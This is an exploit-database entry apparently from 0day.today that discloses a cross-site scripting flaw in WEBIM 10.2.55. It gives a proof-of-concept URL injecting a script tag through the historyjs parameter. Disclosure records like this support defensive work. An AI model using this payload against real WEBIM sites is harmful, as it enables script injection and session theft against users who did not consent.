[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WEBIM 10.2.55 Cross Site Scripting Vulnerability

Author
AsCiI
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35928
Category
web applications
Date add
10-03-2021
Platform
php
# Exploit Title: XSS in WEBIM <http://WEBIM.RU> web application
# Exploit Author: ASCII
# Vendor Homepage: HTTPS://WEBIM.RU
# Version: 10.2.55
# Tested on: 10.2.55
Webim messanger XSS

POC

https://[location].webim.ru/webim/iframe-sample.php?historyjs=1%27"()%26%25<acx><ScRiPt%20>alert(1)</ScRiPt>&location=test&redirected=0&webim-visitor=2&webimVisitor=1

#  0day.today [2024-12-23]  #